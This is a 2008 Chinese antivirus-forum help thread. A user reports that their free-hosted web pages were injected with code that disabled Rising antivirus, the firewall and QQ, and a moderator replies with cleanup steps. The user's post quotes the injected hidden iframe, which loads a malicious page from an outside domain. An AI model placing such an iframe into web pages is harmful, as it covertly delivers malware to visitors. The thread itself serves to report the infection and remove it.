瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 瑞星监控和防火墙还有QQ都给关了,杀软也打不开了

1   1  /  1  页   跳转

瑞星监控和防火墙还有QQ都给关了,杀软也打不开了

收藏
廊坊阿伟
头像
初生襁褓狮
  • 帖子:13
  • 注册: 2007-08-24
  • 来自:
发表于: 2008-04-14 19:08 | 只看楼主 短消息 资料
字号: 1楼

瑞星监控和防火墙还有QQ都给关了,杀软也打不开了

我在网上找到了一个免费空间,申请了一个,做了几个简单的html传了上去,看看速度质量怎么样,谁知道打开后竟然机器卡的不动了,然后状态栏里就显示调用一个不名网址,汗。。我自己做的网页当然知道没有做这调用喽。。。
然后就弹出了 RealPlayer 窗口,我以往也碰到过这样的病毒,可是瑞星都给拦截下就没什么问题了,谁知道这次不行啊,我打开瑞星监控记录查看了下日志已经挑过脚本了,我这心就放下了。突然见机器特别卡,我在看右下角瑞星监控和防火墙给关掉了,QQ等会也给关掉了,我就汗。。。打开任务管理器看了下 有个 RealPlayer 的进程。。真是汗死。。。打开杀软杀下毒吧。。我就都啊。。。杀软也打不开,重起电脑进入安全模式。。买噶。。。安全模式进的去但是杀软还是打不开。。。

冲新打开这个申请的免费空间 http://mjw83.qizai.com 看了下代码 多了这个调用代码

<iframe src="http://www.52m6.com/mm/p27.htm" width="100" height="0"></iframe><!--以上为广告代码,如果需要无广告请购买付费空间,购买地址www.huoshan800.cn--><!--7i24 IIS AD-->

只能扫描下日志保存下来,抓了几张图存起来,冲起电脑Ghost恢复系统,上这里发了这个帖子,求助下。。各位版主高手朋友们,这真是让人头疼啊,这病毒瑞星应该测试下是不是新病毒怎么拦截不了呢。。

我申请的免费空间是 www.qizai.com 这里的,免费空间网址是 http://mjw83.qizai.com 瑞星的工作人员同志到那里取下病毒样本研究下吧,一定要把这顽疾治好了。。呵呵。。

提示:除了瑞星工作人员,其他朋友切勿打开我申请的免费空间,否则后果自负啊

先看下我扫描的日志吧

[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

附件附件:

下载次数:83
文件类型:application/octet-stream
文件大小:
上传时间:2008-4-14 19:08:57
描述:

最后编辑2008-04-15 17:08:21
分享到:
gototop
 
廊坊阿伟
头像
初生襁褓狮
  • 帖子:13
  • 注册: 2007-08-24
  • 来自:
发表于: 2008-04-14 19:11 | 只看楼主 短消息 资料
字号: 2楼

只能上传一个附件。。。我抓的图无法发上来了。。。

嘿嘿 从新编辑下就能发了,和其他论坛一样哈。。。

附件附件:

下载次数:204
文件类型:image/pjpeg
文件大小:
上传时间:2008-4-14 19:11:00
描述:
预览信息:EXIF信息
gototop
 
廊坊阿伟
头像
初生襁褓狮
  • 帖子:13
  • 注册: 2007-08-24
  • 来自:
发表于: 2008-04-14 19:14 | 只看楼主 短消息 资料
字号: 3楼

任务管理器多了这个进程

附件附件:

下载次数:237
文件类型:image/pjpeg
文件大小:
上传时间:2008-4-14 19:14:55
描述:
预览信息:EXIF信息
gototop
 
lqqk7
头像
社区嘉宾
  • 帖子:4876
  • 注册: 2006-03-15
  • 来自:
发表于: 2008-04-14 20:03 | 短消息 资料
字号: 4楼

先下载工具:
windows清理助手下载:http://www.arswp.com/download.html
XDelBox下载:http://www.dodudou.com/down/    打开后选择【原创软件】,下载XDelBox1.6。
清理临时文件工具ATF-Cleaner-cn下载:http://www.qispace.com.cn/attachment.php?fid=34
修复IFEO工具下载:http://www.qispace.com.cn/attachment.php?fid=35
———————————————————————————————————————
务必断开网络链接后再进行以下操作;
———————————————————————————————————————
使用XDelBox删除以下文件:
XDelBox使用方法:http://forum.ikaka.com/topic.asp?board=28&artid=8381032
使用时一定拔掉所有移动存储设备,将下面分隔线中的的文件路径全部复制,然后打开XDelBox直接使用右键菜单的“剪贴板导入不检查路径”导入,勾选“抑制再生”、“驱动安全删除模式”、“备份文件”,最后选择右键菜单的“立刻重启删除”。
———————————————————————————————————————
c:\windows\system32\crugd.dll
c:\windows\system32\fehom.dll
c:\windows\system32\hfjg.dll
c:\windows\system32\msepbe.dll
c:\windows\system32\rdthr.dll
———————————————————————————————————————
重启计算机后会看到一个请选择要启动的操作系统的提示,倒计时5秒,
第一个选项是你自己的Windows系统,
第二个选项是XDelBox的Go XDelBox To Del Files,
默认自动选择第二项,会进入类似DOS的界面,这期间什么操作都不用做,等待它自动运行即可,
待病毒文件删除后会自动重启进入Windows系统,
然后再按以下步骤操作:
———————————————————————————————————————
打开SREngPS.EXE,选择【启动项目】-【注册表】,编辑以下项,将其值改为空:
注意:一定不要删除这些项,将其值改为空即可!
[AppInit_DLLs]
———————————————————————————————————————
使用刚下载的“修复IFEO工具”,运行后按任意键即可;
———————————————————————————————————————
使用刚下载的“清理临时文件工具ATF-Cleaner-cn”,全选所有项目,点击【立即清理】;
———————————————————————————————————————
使用刚下载的“Windows清理助手”清理你的系统。
———————————————————————————————————————
gototop
 
廊坊阿伟
头像
初生襁褓狮
  • 帖子:13
  • 注册: 2007-08-24
  • 来自:
发表于: 2008-04-15 17:20 | 只看楼主 短消息 资料
字号: 5楼

这个是不是新病毒啊,等下次有时间我在用这方法解决吧,现在从新恢复的系统,没什么事,我可不想在体验一回了,呵呵。。。谢谢 版主了
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT